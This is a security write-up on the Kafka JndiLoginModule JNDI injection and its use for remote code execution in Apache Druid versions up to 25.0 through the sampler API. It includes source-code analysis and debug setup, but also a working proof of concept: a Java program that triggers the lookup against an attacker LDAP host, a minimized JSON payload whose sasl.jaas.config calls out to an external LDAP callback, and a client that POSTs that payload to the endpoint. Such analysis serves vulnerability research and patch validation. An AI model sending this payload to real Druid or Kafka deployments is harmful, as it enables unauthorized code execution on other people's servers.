Kafka Command Execution Vulnerability, Part 2: Apache Druid Code Execution Vulnerability

1. Vulnerability Overview

Apache Kafka

Kafka is an open-source stream-processing platform developed by the Apache Software Foundation and written in Scala and Java. The project aims to provide a unified, high-throughput, low-latency platform for handling real-time data feeds. Its persistence layer is essentially a "massively scalable publish/subscribe message queue architected as a distributed transaction log", which makes it very valuable as enterprise-grade infrastructure for processing streaming data.

The vulnerability allows the server to connect to an attacker-controlled LDAP server and deserialize the LDAP response, which an attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. When a suitable gadget is present on the classpath, the attacker can cause unrestricted deserialization of untrusted data (or) RCE.

Exploitation requires access to a Kafka Connect worker and the ability to create or modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. This has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring a connector via the Kafka Connect REST API, an authenticated operator can set the sasl.jaas.config property of any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done through the "producer.override.sasl.jaas.config", "consumer.override.sasl.jaas.config", or "admin.override.sasl.jaas.config" properties.

Apache Druid

Apache Druid is a high-performance real-time analytics engine that supports fast data ingestion, real-time queries, and data visualization. It is mainly used for OLAP (online analytical processing) scenarios and can handle petabyte-scale data. Druid is highly scalable with low latency and high throughput, and is widely used for real-time monitoring, event-driven analytics, user behavior analysis, network security, and similar workloads. With Druid, enterprises and developers can obtain real-time analysis results quickly and improve decision-making efficiency.

Vulnerability Principle

Apache Druid can ingest data from Apache Kafka. Because of the JNDI injection issue in the Kafka client described above, this leads to remote code execution in Druid.

Affected Versions

Apache Druid <= 25.0

2. KafkaConsumer

The previous article showed that Producer<String, String> producer = new KafkaProducer<>(props); can lead to JNDI injection. The same sink exists on the consumer side.

org.apache.kafka.clients.consumer.KafkaConsumer

public KafkaConsumer(Map<String, Object> configs) {
    this((Map)configs, (Deserializer)null, (Deserializer)null);
}

public KafkaConsumer(Properties properties) {
    this((Properties)properties, (Deserializer)null, (Deserializer)null);
}

public KafkaConsumer(Properties properties, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
    this(Utils.propsToMap(properties), keyDeserializer, valueDeserializer);
}

public KafkaConsumer(Map<String, Object> configs, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
    this(new ConsumerConfig(ConsumerConfig.appendDeserializerToConfig(configs, keyDeserializer, valueDeserializer)), keyDeserializer, valueDeserializer);
}

// All of the above ultimately delegate to this constructor
KafkaConsumer(ConsumerConfig config, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
    this.closed = false;
    this.currentThread = new AtomicLong(-1L);
    this.refcount = new AtomicInteger(0);

    try {
        GroupRebalanceConfig groupRebalanceConfig = new GroupRebalanceConfig(config, ProtocolType.CONSUMER);
        this.groupId = Optional.ofNullable(groupRebalanceConfig.groupId);
        this.clientId = config.getString("client.id");
        LogContext logContext;
        if (groupRebalanceConfig.groupInstanceId.isPresent()) {
            logContext = new LogContext("[Consumer instanceId=" + (String)groupRebalanceConfig.groupInstanceId.get() + ", clientId=" + this.clientId + ", groupId=" + (String)this.groupId.orElse("null") + "] ");
        } else {
            logContext = new LogContext("[Consumer clientId=" + this.clientId + ", groupId=" + (String)this.groupId.orElse("null") + "] ");
        }

        this.log = logContext.logger(this.getClass());
        boolean enableAutoCommit = config.maybeOverrideEnableAutoCommit();
        this.groupId.ifPresent((groupIdStr) -> {
            if (groupIdStr.isEmpty()) {
                this.log.warn("Support for using the empty group id by consumers is deprecated and will be removed in the next major release.");
            }

        });
        this.log.debug("Initializing the Kafka consumer");
        this.requestTimeoutMs = (long)config.getInt("request.timeout.ms");
        this.defaultApiTimeoutMs = config.getInt("default.api.timeout.ms");
        this.time = Time.SYSTEM;
        this.metrics = buildMetrics(config, this.time, this.clientId);
        this.retryBackoffMs = config.getLong("retry.backoff.ms");
        List<ConsumerInterceptor<K, V>> interceptorList = config.getConfiguredInstances("interceptor.classes", ConsumerInterceptor.class, Collections.singletonMap("client.id", this.clientId));
        this.interceptors = new ConsumerInterceptors(interceptorList);
        if (keyDeserializer == null) {
            this.keyDeserializer = (Deserializer)config.getConfiguredInstance("key.deserializer", Deserializer.class);
            this.keyDeserializer.configure(config.originals(Collections.singletonMap("client.id", this.clientId)), true);
        } else {
            config.ignore("key.deserializer");
            this.keyDeserializer = keyDeserializer;
        }

        if (valueDeserializer == null) {
            this.valueDeserializer = (Deserializer)config.getConfiguredInstance("value.deserializer", Deserializer.class);
            this.valueDeserializer.configure(config.originals(Collections.singletonMap("client.id", this.clientId)), false);
        } else {
            config.ignore("value.deserializer");
            this.valueDeserializer = valueDeserializer;
        }

        OffsetResetStrategy offsetResetStrategy = OffsetResetStrategy.valueOf(config.getString("auto.offset.reset").toUpperCase(Locale.ROOT));
        this.subscriptions = new SubscriptionState(logContext, offsetResetStrategy);
        ClusterResourceListeners clusterResourceListeners = this.configureClusterResourceListeners(keyDeserializer, valueDeserializer, this.metrics.reporters(), interceptorList);
        this.metadata = new ConsumerMetadata(this.retryBackoffMs, config.getLong("metadata.max.age.ms"), !config.getBoolean("exclude.internal.topics"), config.getBoolean("allow.auto.create.topics"), this.subscriptions, logContext, clusterResourceListeners);
        List<InetSocketAddress> addresses = ClientUtils.parseAndValidateAddresses(config.getList("bootstrap.servers"), config.getString("client.dns.lookup"));
        this.metadata.bootstrap(addresses);
        String metricGrpPrefix = "consumer";
        FetcherMetricsRegistry metricsRegistry = new FetcherMetricsRegistry(Collections.singleton("client-id"), metricGrpPrefix);
        // Calls ClientUtils.createChannelBuilder; from here the call chain is the same as in part one, so it is not repeated
        ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(config, this.time, logContext);
        this.isolationLevel = IsolationLevel.valueOf(config.getString("isolation.level").toUpperCase(Locale.ROOT));
        Sensor throttleTimeSensor = Fetcher.throttleTimeSensor(this.metrics, metricsRegistry);
        int heartbeatIntervalMs = config.getInt("heartbeat.interval.ms");
        ApiVersions apiVersions = new ApiVersions();
        NetworkClient netClient = new NetworkClient(new Selector(config.getLong("connections.max.idle.ms"), this.metrics, this.time, metricGrpPrefix, channelBuilder, logContext), this.metadata, this.clientId, 100, config.getLong("reconnect.backoff.ms"), config.getLong("reconnect.backoff.max.ms"), config.getInt("send.buffer.bytes"), config.getInt("receive.buffer.bytes"), config.getInt("request.timeout.ms"), config.getLong("socket.connection.setup.timeout.ms"), config.getLong("socket.connection.setup.timeout.max.ms"), this.time, true, apiVersions, throttleTimeSensor, logContext);
        ......
    } catch (Throwable var18) {
        if (this.log != null) {
            this.close(0L, true);
        }

        throw new KafkaException("Failed to construct kafka consumer", var18);
    }
}
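
For reference, the sink can be reproduced outside Druid with a short standalone program. This is a minimal sketch, assuming kafka-clients is on the classpath and an attacker-controlled LDAP server is reachable; attacker.example.com:1389 is a placeholder, and on recent JDKs the lookup alone will not load a remote codebase:

import java.util.Properties;
import org.apache.kafka.clients.consumer.KafkaConsumer;

public class ConsumerJndiSinkDemo {
    public static void main(String[] args) {
        Properties props = new Properties();
        // bootstrap.servers only has to parse; it is never actually contacted
        props.put("bootstrap.servers", "127.0.0.1:9092");
        props.put("key.deserializer", "org.apache.kafka.common.serialization.ByteArrayDeserializer");
        props.put("value.deserializer", "org.apache.kafka.common.serialization.ByteArrayDeserializer");
        // A SASL security protocol makes createChannelBuilder build a SASL channel
        props.put("security.protocol", "SASL_PLAINTEXT");
        props.put("sasl.mechanism", "PLAIN");
        // JndiLoginModule performs a JNDI lookup against user.provider.url during login
        props.put("sasl.jaas.config",
            "com.sun.security.auth.module.JndiLoginModule required "
                + "user.provider.url=\"ldap://attacker.example.com:1389/obj\" "
                + "useFirstPass=\"true\" serviceName=\"x\" group.provider.url=\"xxx\";");

        // Constructing the consumer is enough to reach ClientUtils.createChannelBuilder
        // and fire the JAAS login / JNDI lookup; no topic interaction is needed.
        try {
            new KafkaConsumer<byte[], byte[]>(props).close();
        } catch (Exception e) {
            // Construction typically fails only after the lookup has already happened
            System.out.println("KafkaConsumer construction failed: " + e.getMessage());
        }
    }
}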

3. Apache Druid Environment Setup

1. Modify jvm.config for remote debugging

The file is located at apache-druid-xxx\conf\druid\single-server\micro-quickstart\coordinator-overlord\jvm.config

-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005

suspend controls whether the JVM waits for a debugger before running the application: suspend=y pauses at startup, while suspend=n starts without pausing.
address specifies the address and port the debug agent listens on; adjust it as needed (for example, address=*:5005 listens on 0.0.0.0:5005).


2. Start Apache Druid

Run start-micro-quickstart under bin/


Visit ip:8888; the Druid console loads successfully.


4. Vulnerability Analysis

Front-end Input

In the Apache Druid console, add Kafka as a data source.


Source Code Analysis

The vulnerable API endpoint is /druid/indexer/v1/sampler.

The resource class is as follows:

// Endpoint path
@Path("/druid/indexer/v1/sampler")
public class SamplerResource{
    // POST method
    @POST
    // The request MIME type must be application/json
    @Consumes(MediaType.APPLICATION_JSON)
    // The response MIME type is application/json
    @Produces(MediaType.APPLICATION_JSON)
    @ResourceFilters(StateResourceFilter.class)
    public SamplerResponse post(final SamplerSpec sampler){
        // Preconditions.checkNotNull(sampler, "Request body cannot be empty") checks that sampler is not null,
        // then sampler#sample() is invoked
        return Preconditions.checkNotNull(sampler, "Request body cannot be empty").sample();
    }
}

org.apache.druid.client.indexing.SamplerSpec is an interface that declares the sample() method.

// Configures which type information is used during JSON serialization and deserialization.
// This annotation enables polymorphic typing: with it, the "type" field in the JSON
// determines which subclass the payload is deserialized into.
@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
public interface SamplerSpec{
    SamplerResponse sample();
}
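
To make the mechanism concrete, here is a minimal, self-contained sketch of how Jackson resolves a concrete class from the "type" property. The classes below are hypothetical and registered via @JsonSubTypes for brevity; Druid registers its named subtypes (such as "kafka" for KafkaSamplerSpec) through Jackson modules instead, but the resolution works the same way:

import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonSubTypes;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;

public class PolymorphicTypeDemo {
    // "type" in the JSON selects which registered subtype to instantiate
    @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
    @JsonSubTypes(@JsonSubTypes.Type(value = KafkaSpec.class, name = "kafka"))
    interface Spec {
    }

    static class KafkaSpec implements Spec {
        @JsonProperty("topic")
        String topic;
    }

    public static void main(String[] args) throws Exception {
        String json = "{\"type\":\"kafka\",\"topic\":\"any\"}";
        Spec spec = new ObjectMapper().readValue(json, Spec.class);
        // Prints: class PolymorphicTypeDemo$KafkaSpec
        System.out.println(spec.getClass());
    }
}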


org.apache.druid.indexing.seekablestream.SeekableStreamSamplerSpec implements the SamplerSpec interface.

public SeekableStreamSamplerSpec(
    // ingestionSpec
    final SeekableStreamSupervisorSpec ingestionSpec,
    @Nullable final SamplerConfig samplerConfig,
    final InputSourceSampler inputSourceSampler
)
{
    // ingestionSpec must not be null; dataSchema is taken from ingestionSpec.dataSchema
    this.dataSchema = Preconditions.checkNotNull(ingestionSpec, "[spec] is required").getDataSchema();
    // ioConfig must not be null
    this.ioConfig = Preconditions.checkNotNull(ingestionSpec.getIoConfig(), "[spec.ioConfig] is required");
    this.tuningConfig = ingestionSpec.getTuningConfig();
    this.samplerConfig = samplerConfig == null ? SamplerConfig.empty() : samplerConfig;
    this.inputSourceSampler = inputSourceSampler;
}

// sample() on the API endpoint dispatches here
@Override
public SamplerResponse sample()
{
    final InputSource inputSource;
    final InputFormat inputFormat;
    if (dataSchema.getParser() != null) {
        inputSource = new FirehoseFactoryToInputSourceAdaptor(
            new SeekableStreamSamplerFirehoseFactory(),
            dataSchema.getParser()
        );
        inputFormat = null;
    } else {
        RecordSupplier<PartitionIdType, SequenceOffsetType, RecordType> recordSupplier;
        // Dispatches to the subclass implementation KafkaSamplerSpec#createRecordSupplier()
        try {
            recordSupplier = createRecordSupplier();
        }
        catch (Exception e) {
            throw new SamplerException(e, "Unable to create RecordSupplier: %s", Throwables.getRootCause(e).getMessage());
        }

        inputSource = new RecordSupplierInputSource<>(
            ioConfig.getStream(),
            recordSupplier,
            ioConfig.isUseEarliestSequenceNumber(),
            samplerConfig.getTimeoutMs() <= 0 ? null : samplerConfig.getTimeoutMs()
        );
        inputFormat = Preconditions.checkNotNull(
            ioConfig.getInputFormat(),
            "[spec.ioConfig.inputFormat] is required"
        );
    }

    return inputSourceSampler.sample(inputSource, inputFormat, dataSchema, samplerConfig);
}


org.apache.druid.indexing.kafka.KafkaSamplerSpec extends SeekableStreamSamplerSpec.

// Extends SeekableStreamSamplerSpec
public class KafkaSamplerSpec extends SeekableStreamSamplerSpec{
    private final ObjectMapper objectMapper;

    @JsonCreator
    public KafkaSamplerSpec(
        // "spec" in the JSON is bound to the KafkaSupervisorSpec ingestionSpec parameter
        @JsonProperty("spec") final KafkaSupervisorSpec ingestionSpec,
        // "samplerConfig" in the JSON is bound to the SamplerConfig samplerConfig parameter
        @JsonProperty("samplerConfig") @Nullable final SamplerConfig samplerConfig,
        // injected with defaults when absent
        @JacksonInject InputSourceSampler inputSourceSampler,
        @JacksonInject ObjectMapper objectMapper
    ){
        // Calls the parent constructor;
        // ingestionSpec is the "spec" object from the JSON
        super(ingestionSpec, samplerConfig, inputSourceSampler);

        this.objectMapper = objectMapper;
    }

    // sample() dispatches to this method
    @Override
    protected KafkaRecordSupplier createRecordSupplier()
    {
        ClassLoader currCtxCl = Thread.currentThread().getContextClassLoader();
        try {
            Thread.currentThread().setContextClassLoader(getClass().getClassLoader());
            // Declare a map and copy the data from ioConfig.consumerProperties into it
            final Map<String, Object> props = new HashMap<>(((KafkaSupervisorIOConfig) ioConfig).getConsumerProperties());
            // Insert additional values into the map
            props.put("enable.auto.commit", "false");
            props.put("auto.offset.reset", "none");
            props.put("request.timeout.ms", Integer.toString(samplerConfig.getTimeoutMs()));
            // new KafkaRecordSupplier
            // props is the map declared above; ioConfig is the ioConfig from ingestionSpec
            return new KafkaRecordSupplier(props, objectMapper, ((KafkaSupervisorIOConfig) ioConfig).getConfigOverrides());
        }
        finally {
            Thread.currentThread().setContextClassLoader(currCtxCl);
        }
    }
}


org.apache.druid.indexing.kafka.supervisor.KafkaSupervisorSpec

@JsonCreator
public KafkaSupervisorSpec(
    @JsonProperty("spec") @Nullable KafkaSupervisorIngestionSpec ingestionSchema,
    @JsonProperty("dataSchema") @Nullable DataSchema dataSchema,
    @JsonProperty("tuningConfig") @Nullable KafkaSupervisorTuningConfig tuningConfig,
    // "ioConfig" inside the spec JSON is bound to KafkaSupervisorIOConfig ioConfig
    @JsonProperty("ioConfig") @Nullable KafkaSupervisorIOConfig ioConfig,
    @JsonProperty("context") Map<String, Object> context,
    @JsonProperty("suspended") Boolean suspended,
    @JacksonInject TaskStorage taskStorage,
    @JacksonInject TaskMaster taskMaster,
    @JacksonInject IndexerMetadataStorageCoordinator indexerMetadataStorageCoordinator,
    @JacksonInject KafkaIndexTaskClientFactory kafkaIndexTaskClientFactory,
    @JacksonInject @Json ObjectMapper mapper,
    @JacksonInject ServiceEmitter emitter,
    @JacksonInject DruidMonitorSchedulerConfig monitorSchedulerConfig,
    @JacksonInject RowIngestionMetersFactory rowIngestionMetersFactory,
    @JacksonInject SupervisorStateManagerConfig supervisorStateManagerConfig
)
{
    super(
        ingestionSchema != null
        ? ingestionSchema
        : new KafkaSupervisorIngestionSpec(
            dataSchema,
            ioConfig,
            tuningConfig != null
            ? tuningConfig
            : KafkaSupervisorTuningConfig.defaultConfig()
        ),
        context,
        suspended,
        taskStorage,
        taskMaster,
        indexerMetadataStorageCoordinator,
        kafkaIndexTaskClientFactory,
        mapper,
        emitter,
        monitorSchedulerConfig,
        rowIngestionMetersFactory,
        supervisorStateManagerConfig
    );
}

org.apache.druid.indexing.kafka.supervisor.KafkaSupervisorIOConfig

@JsonCreator
public KafkaSupervisorIOConfig(
    @JsonProperty("topic") String topic,
    @JsonProperty("inputFormat") InputFormat inputFormat,
    @JsonProperty("replicas") Integer replicas,
    @JsonProperty("taskCount") Integer taskCount,
    @JsonProperty("taskDuration") Period taskDuration,
    @JsonProperty("consumerProperties") Map<String, Object> consumerProperties,
    @Nullable @JsonProperty("autoScalerConfig") AutoScalerConfig autoScalerConfig,
    @JsonProperty("pollTimeout") Long pollTimeout,
    @JsonProperty("startDelay") Period startDelay,
    @JsonProperty("period") Period period,
    @JsonProperty("useEarliestOffset") Boolean useEarliestOffset,
    @JsonProperty("completionTimeout") Period completionTimeout,
    @JsonProperty("lateMessageRejectionPeriod") Period lateMessageRejectionPeriod,
    @JsonProperty("earlyMessageRejectionPeriod") Period earlyMessageRejectionPeriod,
    @JsonProperty("lateMessageRejectionStartDateTime") DateTime lateMessageRejectionStartDateTime,
    @JsonProperty("configOverrides") KafkaConfigOverrides configOverrides,
    @JsonProperty("idleConfig") IdleConfig idleConfig
)
{
    super(
        // topic must not be null
        Preconditions.checkNotNull(topic, "topic"),
        inputFormat,
        replicas,
        taskCount,
        taskDuration,
        startDelay,
        period,
        useEarliestOffset,
        completionTimeout,
        lateMessageRejectionPeriod,
        earlyMessageRejectionPeriod,
        autoScalerConfig,
        lateMessageRejectionStartDateTime,
        idleConfig
    );

    this.consumerProperties = Preconditions.checkNotNull(consumerProperties, "consumerProperties");
    Preconditions.checkNotNull(
        consumerProperties.get(BOOTSTRAP_SERVERS_KEY),
        StringUtils.format("consumerProperties must contain entry for [%s]", BOOTSTRAP_SERVERS_KEY)
    );
    this.pollTimeout = pollTimeout != null ? pollTimeout : DEFAULT_POLL_TIMEOUT_MILLIS;
    this.configOverrides = configOverrides;
}

org.apache.druid.indexing.kafka.KafkaRecordSupplier

// Constructor; the call chain reaches this constructor
public KafkaRecordSupplier(
    Map<String, Object> consumerProperties,
    ObjectMapper sortingMapper,
    KafkaConfigOverrides configOverrides
)
{
    this(getKafkaConsumer(sortingMapper, consumerProperties, configOverrides));
}


// The constructor calls getKafkaConsumer()
// sortingMapper      is the objectMapper from KafkaSamplerSpec
// consumerProperties is the props map declared earlier; the attacker-controlled data lives in this map
// configOverrides    is the configOverrides from the KafkaSupervisorIngestionSpec
public static KafkaConsumer<byte[], byte[]> getKafkaConsumer(
    ObjectMapper sortingMapper,
    Map<String, Object> consumerProperties,
    KafkaConfigOverrides configOverrides
)
{
    final Map<String, Object> consumerConfigs = KafkaConsumerConfigs.getConsumerProperties();
    final Properties props = new Properties();
    Map<String, Object> effectiveConsumerProperties;
    if (configOverrides != null) {
        effectiveConsumerProperties = configOverrides.overrideConfigs(consumerProperties);
    } else {
        effectiveConsumerProperties = consumerProperties;
    }
    // Copy the entries from effectiveConsumerProperties into props
    addConsumerPropertiesFromConfig(
        props,
        sortingMapper,
        effectiveConsumerProperties
    );
    props.putIfAbsent("isolation.level", "read_committed");
    props.putIfAbsent("group.id", StringUtils.format("kafka-supervisor-%s", IdUtils.getRandomId()));
    props.putAll(consumerConfigs);

    ClassLoader currCtxCl = Thread.currentThread().getContextClassLoader();
    try {
        Thread.currentThread().setContextClassLoader(KafkaRecordSupplier.class.getClassLoader());
        Deserializer keyDeserializerObject = getKafkaDeserializer(props, "key.deserializer", true);
        Deserializer valueDeserializerObject = getKafkaDeserializer(props, "value.deserializer", false);
        // new KafkaConsumer<> — props contains the data supplied by the front-end request
        return new KafkaConsumer<>(props, keyDeserializerObject, valueDeserializerObject);
    }
    finally {
        Thread.currentThread().setContextClassLoader(currCtxCl);
    }
}


Execution reaches new KafkaConsumer().


JNDI injection succeeds (DNSLog is used here to simulate the callback; a real JNDI injection requires a reachable malicious JNDI server, and JDK version restrictions also apply, since recent JDKs disable remote codebase loading for LDAP by default).


Payload

Minimized payload:

bootstrap.servers can be any value

sasl.jaas.config: see the previous article for the value

topic must not be empty

dataSchema must not be empty

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"6.6.6.6:9092",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://lc7g01.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" group.provider.url=\"xxx\";"
            },
            "topic":"any"
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        }
    }
}
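
As a usage sketch (assuming the payload above is saved as payload.json and the quickstart router on port 8888 proxies the indexer API; both the host and the file name are placeholders), the request could be sent with nothing but the JDK HTTP client:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.file.Path;

public class SamplerPost {
    public static void main(String[] args) throws Exception {
        // Hypothetical target; adjust host/port to your setup
        HttpRequest request = HttpRequest.newBuilder()
            .uri(URI.create("http://127.0.0.1:8888/druid/indexer/v1/sampler"))
            .header("Content-Type", "application/json")
            .POST(HttpRequest.BodyPublishers.ofFile(Path.of("payload.json")))
            .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
            .send(request, HttpResponse.BodyHandlers.ofString());

        // The sampler request usually errors out only after the Kafka consumer
        // (and therefore the JNDI lookup) has already been constructed server-side.
        System.out.println(response.statusCode());
        System.out.println(response.body());
    }
}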
